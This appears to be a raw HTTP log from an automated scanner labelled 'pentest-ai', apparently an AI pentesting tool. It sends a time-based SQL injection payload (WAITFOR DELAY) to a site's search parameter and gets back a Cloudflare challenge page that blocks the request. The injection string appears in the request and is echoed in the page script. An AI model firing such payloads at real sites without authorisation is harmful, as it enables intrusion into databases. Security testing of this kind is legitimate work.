REQUEST:
GET https://my.myfirst.tech/search?search=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9368
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847363895a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=m17xAHX7iItuIYe7RMPOV5xxzTZtc%2FxSR%2Fht0WQXVnX%2BOkbyhis1JZoa8hV3MsbSkd7U5E%2BzLjxEw2LOXz7ORx1OfeXPioDJiaKhnCgK%2BArgn6lzVVJ%2B3opd1klaBogztQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847363895a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'Ku8LOxf5wERgJ4s53Hz9ColQ.ccYj4OX_KlAlOMlfco-1784281153-1.2.1.1-DzNFYGbL2qUeSBrGUzQPknldwyiIBTFaUKzS0fvbVUJealKJ5tXN18drUPpjIA7x',cITimeS: '1784281153',cRay: 'a1c847363895a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?search=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_tk=FA8fE99bFEzRthcMjRXrmUTA0s57XFuo4JPHzJi.SP8-1784281153-1.0.1.1-6PM7oVwJ2BJEV8RA52XIGd9OQO6Y0QC0ZfHVbVcWfio",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?search=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_f_tk=FA8fE99bFEzRthcMjRXrmUTA0s57XFuo4JPHzJi.SP8-1784281153-1.0.1.1-6PM7oVwJ2BJEV8RA52XIGd9OQO6Y0QC0ZfHVbVcWfio",md: '4x1AkGtohKwX.EQ566WoPGa8m1E6Nh7u5EJdmhTHVFk-1784281153-1.2.1.1-yZJDEYOFs1iyn8_eYmLRSAgDabr_Xa93rLOIHrKvIvZNhlOpNxlYFmP8i11MNIs3zMAzMiV7VuKQ9513vWgSfiL8oJnszZ.PA9dKA1GXvQgTe3j2jEH8Xn1FeEcxUx7PLgZMZ9EqvdUohx1rRGXdUFP06p9FZj0SZSk2Cdqku7LZ9Qu.MDmuMWweekPwKq39ItooNWdIQLTUDdbf_.2BaWP5zcFL6uVrcCShcf9snGi_3bG617zm10JKy9Z_flnsJXh7oBdXe825jdy3.wnOigh5j5gs2XCEPcrRVwgrOlQprwv5WfR967q2a06ydm1.6Hj4F32z6ZXWeFyx1pCJDYiTlgeG1OhVi._V.f2U1U7ExvZIywloHz7V_qLoRoj9_J_HgdsSU.QUdsqC_j07mBnbk8Iz8cEFLKwtg_jiVUW1M4oA3LMMHhBrpzgUMqmKl4S5sviXg9uFkzrSNIYWCAB8rtHzfY9TWIE4kJpb0KV.Wkad2Y7sfu.On5S5v5BMtb_dkl8gDPMGiKrn79.UUmDgqwucQx9tyREpkL8S1eZW4YY8hfQQk0ZrAynbe_4pk5koaonWZ46qUFmZAUwaM2JFrDR.aG4gRkM24wjPRfB7ZbSGhMoyHA34oQdg659uSwF4aCFkd21KLEIrmTVVS0o54DPYGVA024OkC7tDe4OftAFjzLJSoPC0ZylhKoGkoI0gt7tzI_DqTG4lHQAe4L7MZItpI4GyZpQAnZ0NGa8ce_Xq7Tx9wV0hYxhZXUICivdPca4nKSI2XyLSj9y2Mb3sqdu.nYcNMo6KhY5FP6tjrLWLG_GzdkJQNqabpGmWt57M4sPC6_NS0XEffCyThizplVtMeXur0JCA7Usv_k48FHfQprM0DJRUy_q_YUVUIPymrQvP3S9sPJByLqd8wckd1DtYs0TElerbiWPL88pHdpMG4.IhFXSN8B9StrJR730faEMTMFUcm6agUYT3GTrG7yb_cp5viG_HHhz6o7hsrVBgkB4NmWJtuYpS3wH8kyNJLsQyGE.aFeCW253.9T0xWq2e.xJd1cQsF.Hbla0JsMK7b_LlYlaqcP4hC8FN899.SwWzUwdZGmjAJOWGZtPVyUJZYvHpOrRg2wC35JcCQw_x2Y8C3ZPSYiO4s7IkFNainb9Rv6porZe4wFmPMmhAUOOBkfsqO5VBgfD1N58',mdrd: 'uplG89oJPjL6yp5p1sr8k_PpbSG0Cn5xbH3ExYVFaio-1784281153-1.2.1.1-PArLaEsmZbOSCmVh3GgQmBD6mElH.Q3WU7UJftcw8GYn7KiGOWNT5M71zKu9SCw3F0JhnTYybhtOONSFloaXgIM8OmKsFaClTw3HeJOLdui8MSWkObb.GjMnGkoNleQuszpNbuwEEC9wXNUZCOgcX_W02kcdhaWsnv75g86OyFKqPij9tayB2C0pnIacURedme..A8WyroMn3fAbSdhXMztz_6zRff7iiD6axmRxO9HqATXZSORrUolvBkX22t4E',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847363895a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?search=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_rt_tk=FA8fE99bFEzRthcMjRXrmUTA0s57XFuo4JPHzJi.SP8-1784281153-1.0.1.1-6PM7oVwJ2BJEV8RA52XIGd9OQO6Y0QC0ZfHVbVcWfio"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
